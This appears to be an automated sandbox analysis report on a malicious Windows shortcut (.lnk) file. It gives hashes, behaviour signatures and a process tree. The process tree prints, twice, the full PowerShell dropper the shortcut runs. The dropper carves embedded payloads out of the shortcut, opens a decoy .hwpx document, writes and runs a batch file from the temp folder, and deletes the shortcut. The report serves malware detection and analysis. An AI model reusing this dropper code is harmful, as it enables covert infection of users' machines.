Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
-
submitted
14/11/2024, 09:10
General
-
Target
bb83597cdf057db754def79d3f94b6cf8837b358178e10e4cc792da56a7523b3.lnk
-
Size
51.4MB
-
MD5
5b44285747891464c496aa477e450f10
-
SHA1
73417ded382af2e0f3fca04d8d07679af134038b
-
SHA256
bb83597cdf057db754def79d3f94b6cf8837b358178e10e4cc792da56a7523b3
-
SHA512
6855cc7f80972bd9ec0b138220636aca9b4e24e5a2d5663cf5147ee154b0d28a08facbbb44dcb336eefce7fccc6296d0644ed3a2e1b81f2cc0de8a616fccafe6
-
SSDEEP
12288:TbjNtn78DnM5CnYFE/oS2P5NdhuKp5AyE9KpNwZ66T9Nzk:TNto2i/J2P5ThuM5XE9aNwZs
Score
6/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\bb83597cdf057db754def79d3f94b6cf8837b358178e10e4cc792da56a7523b3.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'};$exs=@('.lnk');$lnkPath = Get-ChildItem -Path $dirPath -Recurse *.* -File | where {$_.extension -in $exs} | where-object {$_.length -eq 0x03373260} | Select-Object -ExpandProperty FullName ;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000110C, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x0000A328;$lnkFile.Read($pdfFile, 0, 0x0000A328);$pdfPath = $lnkPath.replace('.lnk','.hwpx');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0000B434,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$exePath=$env:temp+'\acer.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x000E45C4,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x00000633;$lnkFile.Read($stringByte, 0, 0x00000633); $batStrPath = $env:temp+'\'+'dell.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x000E4BF7,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000143;$lnkFile.Read($batByte, 0, 0x00000143);$executePath = $env:temp+'\'+'asu'+'s.b'+'a'+'t'; Write-Host $executePath; Write-Host $batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close(); remove-item -path $lnkPath -force; "&& exit2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'};$exs=@('.lnk');$lnkPath = Get-ChildItem -Path $dirPath -Recurse *.* -File | where {$_.extension -in $exs} | where-object {$_.length -eq 0x03373260} | Select-Object -ExpandProperty FullName ;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000110C, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x0000A328;$lnkFile.Read($pdfFile, 0, 0x0000A328);$pdfPath = $lnkPath.replace('.lnk','.hwpx');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0000B434,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$exePath=$env:temp+'\acer.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x000E45C4,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x00000633;$lnkFile.Read($stringByte, 0, 0x00000633); $batStrPath = $env:temp+'\'+'dell.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x000E4BF7,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000143;$lnkFile.Read($batByte, 0, 0x00000143);$executePath = $env:temp+'\'+'asu'+'s.b'+'a'+'t'; Write-Host $executePath; Write-Host $batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close(); remove-item -path $lnkPath -force; "3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-